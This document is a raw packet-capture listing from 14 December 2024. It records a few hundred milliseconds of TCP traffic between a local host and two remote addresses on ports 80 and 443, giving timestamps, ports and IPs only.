Dec 14, 2024 12:56:43.655649900 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.655693054 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.655972958 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.656721115 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.656770945 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.656815052 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.657140970 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.657668114 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.657706022 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.657747984 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.657789946 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.658597946 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.658653975 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.658715963 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.658866882 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.659678936 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.659735918 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.659780979 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.659807920 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.659835100 CET	443	49864	142.250.181.132	192.168.2.4
Dec 14, 2024 12:56:43.659905910 CET	49864	443	192.168.2.4	142.250.181.132
Dec 14, 2024 12:56:43.659918070 CET	443	49864	142.250.181.132	192.168.2.4
Dec 14, 2024 12:56:43.660717010 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.660835028 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.661032915 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.661032915 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.661839962 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.661875963 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.662087917 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.662739038 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.662801027 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.662837982 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.663105965 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.663913965 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.663949966 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.664169073 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.664819956 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.664890051 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.664927959 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.665148973 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.666018009 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.666052103 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.666100025 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.666100025 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.667009115 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.667112112 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.667155981 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.667336941 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.668019056 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.668508053 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.668570042 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.668745995 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.669117928 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.669152975 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.669190884 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.669190884 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.670051098 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.670166016 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.670309067 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.671113968 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.671170950 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.671231985 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.671334028 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.671791077 CET	443	49864	142.250.181.132	192.168.2.4
Dec 14, 2024 12:56:43.671881914 CET	49864	443	192.168.2.4	142.250.181.132
Dec 14, 2024 12:56:43.671890020 CET	443	49864	142.250.181.132	192.168.2.4
Dec 14, 2024 12:56:43.672143936 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.672449112 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.672532082 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.673145056 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.673198938 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.673552990 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.673746109 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.674278975 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.674367905 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.674377918 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.674633980 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.675255060 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.675328016 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.675539017 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.675611019 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.676356077 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.676407099 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.676561117 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.677406073 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.677512884 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.677597046 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.677597046 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.678378105 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.678482056 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.678483963 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.678549051 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.679384947 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.679446936 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.679521084 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.679632902 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.680581093 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.680614948 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.680655003 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.680655003 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.680938959 CET	443	49864	142.250.181.132	192.168.2.4
Dec 14, 2024 12:56:43.681087971 CET	49864	443	192.168.2.4	142.250.181.132
Dec 14, 2024 12:56:43.681097031 CET	443	49864	142.250.181.132	192.168.2.4
Dec 14, 2024 12:56:43.681463003 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.681694031 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.681735039 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.681735039 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.682590008 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.682693958 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.682750940 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.683211088 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.683697939 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.683732986 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.683983088 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.684727907 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.684762955 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.684818029 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.684818029 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.685688972 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.685724020 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.685770035 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.685770035 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.686830997 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.686863899 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.686944962 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.686976910 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.687735081 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.687832117 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.687844038 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.688029051 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.688829899 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.689130068 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.689191103 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.689323902 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.689793110 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.689893007 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.689898968 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.690196037 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.690864086 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.690938950 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.690965891 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.691158056 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.691915989 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.691948891 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.691992998 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.691992998 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.692037106 CET	443	49864	142.250.181.132	192.168.2.4
Dec 14, 2024 12:56:43.692162991 CET	49864	443	192.168.2.4	142.250.181.132
Dec 14, 2024 12:56:43.692183018 CET	443	49864	142.250.181.132	192.168.2.4
Dec 14, 2024 12:56:43.693033934 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.693068027 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.693141937 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.694066048 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.694099903 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.694211006 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.695174932 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.695209026 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.695255995 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.695255995 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.696160078 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.696193933 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.696645975 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.697035074 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.697138071 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.697195053 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.697280884 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.698240995 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.698276043 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.698441982 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.699210882 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.699343920 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.699398994 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.699398994 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.700258970 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.700342894 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.700356960 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.700388908 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.701136112 CET	443	49864	142.250.181.132	192.168.2.4
Dec 14, 2024 12:56:43.701255083 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.701289892 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.701370955 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.701370955 CET	49864	443	192.168.2.4	142.250.181.132
Dec 14, 2024 12:56:43.701392889 CET	443	49864	142.250.181.132	192.168.2.4
Dec 14, 2024 12:56:43.702393055 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.702429056 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.702471972 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.702543974 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.703391075 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.703427076 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.703464031 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.703479052 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.704385042 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.704427958 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.704483986 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.704565048 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.705498934 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.705533981 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.705579996 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.705579996 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.706451893 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.706501007 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.706557035 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.706762075 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.707474947 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.707632065 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.707693100 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.707760096 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.708631039 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.708667040 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.708695889 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.708776951 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.709492922 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.709568977 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.710617065 CET	443	49864	142.250.181.132	192.168.2.4
Dec 14, 2024 12:56:43.710685968 CET	49864	443	192.168.2.4	142.250.181.132
Dec 14, 2024 12:56:43.710694075 CET	443	49864	142.250.181.132	192.168.2.4
Dec 14, 2024 12:56:43.720166922 CET	443	49864	142.250.181.132	192.168.2.4
Dec 14, 2024 12:56:43.720223904 CET	49864	443	192.168.2.4	142.250.181.132
Dec 14, 2024 12:56:43.720233917 CET	443	49864	142.250.181.132	192.168.2.4
Dec 14, 2024 12:56:43.728559017 CET	443	49864	142.250.181.132	192.168.2.4
Dec 14, 2024 12:56:43.728625059 CET	49864	443	192.168.2.4	142.250.181.132
Dec 14, 2024 12:56:43.728632927 CET	443	49864	142.250.181.132	192.168.2.4
Dec 14, 2024 12:56:43.737205029 CET	443	49864	142.250.181.132	192.168.2.4
Dec 14, 2024 12:56:43.737231016 CET	443	49864	142.250.181.132	192.168.2.4
Dec 14, 2024 12:56:43.737274885 CET	49864	443	192.168.2.4	142.250.181.132
Dec 14, 2024 12:56:43.737286091 CET	443	49864	142.250.181.132	192.168.2.4
Dec 14, 2024 12:56:43.737739086 CET	49864	443	192.168.2.4	142.250.181.132
Dec 14, 2024 12:56:43.745507002 CET	443	49864	142.250.181.132	192.168.2.4
Dec 14, 2024 12:56:43.754295111 CET	443	49864	142.250.181.132	192.168.2.4
Dec 14, 2024 12:56:43.754318953 CET	443	49864	142.250.181.132	192.168.2.4
Dec 14, 2024 12:56:43.754395962 CET	49864	443	192.168.2.4	142.250.181.132
Dec 14, 2024 12:56:43.754405975 CET	443	49864	142.250.181.132	192.168.2.4
Dec 14, 2024 12:56:43.754518032 CET	49864	443	192.168.2.4	142.250.181.132
Dec 14, 2024 12:56:43.762232065 CET	443	49864	142.250.181.132	192.168.2.4
Dec 14, 2024 12:56:43.770004034 CET	443	49864	142.250.181.132	192.168.2.4
Dec 14, 2024 12:56:43.770035982 CET	443	49864	142.250.181.132	192.168.2.4
Dec 14, 2024 12:56:43.771018982 CET	49864	443	192.168.2.4	142.250.181.132
Dec 14, 2024 12:56:43.771074057 CET	443	49864	142.250.181.132	192.168.2.4
Dec 14, 2024 12:56:43.771197081 CET	49864	443	192.168.2.4	142.250.181.132
Dec 14, 2024 12:56:43.773787975 CET	443	49864	142.250.181.132	192.168.2.4
Dec 14, 2024 12:56:43.779344082 CET	443	49864	142.250.181.132	192.168.2.4
Dec 14, 2024 12:56:43.779406071 CET	49864	443	192.168.2.4	142.250.181.132
Dec 14, 2024 12:56:43.779417992 CET	443	49864	142.250.181.132	192.168.2.4
Dec 14, 2024 12:56:43.785012007 CET	443	49864	142.250.181.132	192.168.2.4
Dec 14, 2024 12:56:43.785043001 CET	443	49864	142.250.181.132	192.168.2.4
Dec 14, 2024 12:56:43.785213947 CET	49864	443	192.168.2.4	142.250.181.132
Dec 14, 2024 12:56:43.785228968 CET	443	49864	142.250.181.132	192.168.2.4
Dec 14, 2024 12:56:43.785471916 CET	49864	443	192.168.2.4	142.250.181.132
Dec 14, 2024 12:56:43.789760113 CET	443	49864	142.250.181.132	192.168.2.4
Dec 14, 2024 12:56:43.795433044 CET	443	49864	142.250.181.132	192.168.2.4
Dec 14, 2024 12:56:43.795506001 CET	443	49864	142.250.181.132	192.168.2.4
Dec 14, 2024 12:56:43.795557022 CET	49864	443	192.168.2.4	142.250.181.132
Dec 14, 2024 12:56:43.795567989 CET	443	49864	142.250.181.132	192.168.2.4
Dec 14, 2024 12:56:43.798173904 CET	49864	443	192.168.2.4	142.250.181.132
Dec 14, 2024 12:56:43.800700903 CET	443	49864	142.250.181.132	192.168.2.4
Dec 14, 2024 12:56:43.806271076 CET	443	49864	142.250.181.132	192.168.2.4
Dec 14, 2024 12:56:43.806302071 CET	443	49864	142.250.181.132	192.168.2.4
Dec 14, 2024 12:56:43.806394100 CET	49864	443	192.168.2.4	142.250.181.132
Dec 14, 2024 12:56:43.806410074 CET	443	49864	142.250.181.132	192.168.2.4
Dec 14, 2024 12:56:43.806680918 CET	49864	443	192.168.2.4	142.250.181.132
Dec 14, 2024 12:56:43.811598063 CET	443	49864	142.250.181.132	192.168.2.4
Dec 14, 2024 12:56:43.812946081 CET	443	49864	142.250.181.132	192.168.2.4
Dec 14, 2024 12:56:43.813020945 CET	49864	443	192.168.2.4	142.250.181.132
Dec 14, 2024 12:56:43.813040018 CET	443	49864	142.250.181.132	192.168.2.4
Dec 14, 2024 12:56:43.817188025 CET	443	49864	142.250.181.132	192.168.2.4
Dec 14, 2024 12:56:43.817516088 CET	49864	443	192.168.2.4	142.250.181.132
Dec 14, 2024 12:56:43.817526102 CET	443	49864	142.250.181.132	192.168.2.4
Dec 14, 2024 12:56:43.817830086 CET	49864	443	192.168.2.4	142.250.181.132
Dec 14, 2024 12:56:43.817868948 CET	443	49864	142.250.181.132	192.168.2.4
Dec 14, 2024 12:56:43.817985058 CET	443	49864	142.250.181.132	192.168.2.4
Dec 14, 2024 12:56:43.818063974 CET	49864	443	192.168.2.4	142.250.181.132
Dec 14, 2024 12:56:43.818063974 CET	49864	443	192.168.2.4	142.250.181.132
Dec 14, 2024 12:56:43.847527027 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.847795010 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.847868919 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.847973108 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.848108053 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.848148108 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.848249912 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.849087000 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.849138975 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.849209070 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.850141048 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.850194931 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.850462914 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.850886106 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.851001978 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.851249933 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.852035999 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.852072954 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.852185011 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.853001118 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.853111982 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.853159904 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.853252888 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.853996992 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.854163885 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.854229927 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.854327917 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.855052948 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.855139017 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.855185986 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.855185986 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.856240988 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.856276989 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.856369019 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.856369019 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.857146025 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.857275009 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.857441902 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.858191013 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.858292103 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.858351946 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.858519077 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.859194040 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.859390974 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.859982967 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.859982967 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.860342979 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.860378027 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.860447884 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.860447884 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.861251116 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.861306906 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.861383915 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.861763954 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.862459898 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.862494946 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.862628937 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.863399029 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.863645077 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.863722086 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.864500999 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.864536047 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.864577055 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.864661932 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.865427017 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.865560055 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.865617037 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.865688086 CET	49860	80	192.168.2.4	31.41.244.11
